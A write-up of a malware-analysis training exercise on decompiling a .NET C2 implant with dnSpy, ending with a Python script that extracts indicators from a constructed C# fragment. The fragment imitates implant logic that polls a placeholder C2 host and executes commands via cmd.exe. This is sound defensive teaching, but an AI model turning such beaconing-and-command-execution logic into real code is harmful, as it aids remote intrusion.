We are tasked with analysing a C2’s back-end infrastructure based on a malware sample’s source code.
Learning Objectives #
- The foundations of analysing malware samples safely.
- The fundamentals of .NET binaries.
- The dnSpy tool for decompiling malware samples written in .NET
- Building an essential methodology for analysing malware source code
Overview #
Handling a malware sample is dangerous. Always take precautions during your analysis.
A typical environment setup of a malware sandbox:
- Network controls: Limit and monitor the network traffic.
- Virtualisation: VMware, VirtualBox, Hyper-V. Runs the malware in a controlled, isolated environment and allows for easy snapshots, resets and disposal after the analysis.
- Monitoring and logging: Sandboxes record detailed logs of the malware’s activities. The logs are invaluable for analysing and understanding the malware’s behaviour.
These are my key takeaways from today:
- dnSpy is an easy tool to use to decompile and look at the source code of .NET applications.
- When analysing malware, look at the functions before main to get a better understanding of what everything does.
Introduction to .NET Compiled Binaries #
.NET binaries are compiled files containing code written in languages compatible with the .NET framework (C#, VB.NET, F# etc.). These files are executable files (.exe) or dynamic link libraries (.dll).
Compared to languages like C, languages that use .NET don’t translate the code directly into machine code at compilation. Instead they compile to an intermediate language (IL, comparable to pseudocode), which the Common Language Runtime (CLR) translates into native machine code at runtime.
It’s only possible to analyse a C or C++ compiled binary by reading its assembly instructions (low-level). A C# binary, by contrast, can be decompiled and its source code retrieved.
C2 #
Malware with C2 capabilities typically exhibits the following behaviours:
- HTTP requests: C2 servers often communicate with victims using HTTP(S) requests, which can be used to send commands or receive data.
- Command execution: This is the most common capability, allowing attackers to execute OS commands on the victim machine.
- Sleep or delay: To evade detection and stay stealthy, malware is often instructed to sleep or delay for a specific period.
dnSpy, decompile malware #
dnSpy is an open-source .NET assembly (C#) debugger and editor, typically used for reverse engineering .NET applications and analysing their code. It can also edit the code, set breakpoints and step through the code one line at a time (debugging).
The main function is where the program starts. Inside it, several functions are called; they can be seen to the left in dnSpy, in the Assembly Explorer.
Questions #
- What HTTP User-Agent was used by the malware for its connection requests to the C2 server?
Found inside the GetIt function.
- What is the HTTP method used to submit the command execution output?
To submit information to a server, we use the POST method. (Basic information in web requests, nothing special in this C2.)
- What key is used by the malware to encrypt or decrypt the C2 data?
Found inside the Encryptor and Decryptor functions.
- What is the first HTTP URL used by the malware?
Found inside the main function, variable str.
- How many seconds is the hardcoded value used by the sleep function?
Found inside the main function, variable count.
This is written in milliseconds and needs to be converted to seconds by dividing the value by 1000.
print(REDACTED/1000)
- What is the C2 command the attacker uses to execute commands via cmd.exe?
Looking inside the for-loop that calls the ExecuteCommand function under main, find where the if-else for ExecuteCommand is.
(if (!(a == "REDACTED")) else ..[snip].. Program.ExecuteCommand)
- What is the domain used by the malware to download another binary?
Found inside the main function, at line 43 (in the implant).
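The questions above walk through the same indicators every time (User-Agent, URL, key, sleep interval, command keyword), so the methodology can be scripted as a first-pass triage over the decompiled source. The example below is added here and is not code from the room or the implant; the C# fragment it scans is constructed, with placeholder values, and merely mimics the shape of the decompiled functions described above (GetIt, Decryptor, main).

```python
import re

# Constructed fragment of decompiled C# (placeholder values, not the room's implant).
DECOMPILED_SOURCE = r'''
public static string GetIt(string url)
{
    WebClient webClient = new WebClient();
    webClient.Headers.Add("User-Agent", "Mozilla/5.0 (ExampleAgent/1.0)");
    return webClient.DownloadString(url);
}
private static void Main(string[] args)
{
    string str = "http://c2.example.invalid/tasks";
    int count = 7000;
    Thread.Sleep(count);
    string data = Decryptor(GetIt(str), "ExampleKey123");
    if (!(data == "runcmd")) { } else { Program.ExecuteCommand("cmd.exe", data); }
}
'''

def triage(source: str) -> dict:
    """Pull the C2 indicators asked for in the analysis out of decompiled C# text."""
    findings = {}
    ua = re.search(r'"User-Agent",\s*"([^"]+)"', source)
    findings["user_agent"] = ua.group(1) if ua else None
    findings["urls"] = re.findall(r'"(https?://[^"]+)"', source)
    # Key is the second argument of Encryptor/Decryptor when passed as a literal.
    key = re.search(r'(?:Encryptor|Decryptor)\([^,]+,\s*"([^"]+)"\)', source)
    findings["key"] = key.group(1) if key else None
    # Thread.Sleep(x) takes milliseconds; resolve x if it is a literal or an int variable.
    ms = None
    sleep = re.search(r'Thread\.Sleep\((\w+)\)', source)
    if sleep:
        arg = sleep.group(1)
        if arg.isdigit():
            ms = int(arg)
        else:
            assign = re.search(r'int\s+' + re.escape(arg) + r'\s*=\s*(\d+)\s*;', source)
            ms = int(assign.group(1)) if assign else None
    findings["sleep_seconds"] = ms / 1000 if ms is not None else None
    # The command keyword is the literal compared against in the if (!(x == "...")) gate.
    cmd = re.search(r'if\s*\(!\((\w+)\s*==\s*"([^"]+)"\)\)', source)
    findings["command_keyword"] = cmd.group(2) if cmd else None
    findings["cmd_exec"] = "cmd.exe" in source
    return findings

if __name__ == "__main__":
    for name, value in triage(DECOMPILED_SOURCE).items():
        print(f"{name}: {value}")
```

The regexes only catch string literals and simple int assignments; anything built at runtime (concatenated URLs, keys derived from data) still has to be read by hand in dnSpy.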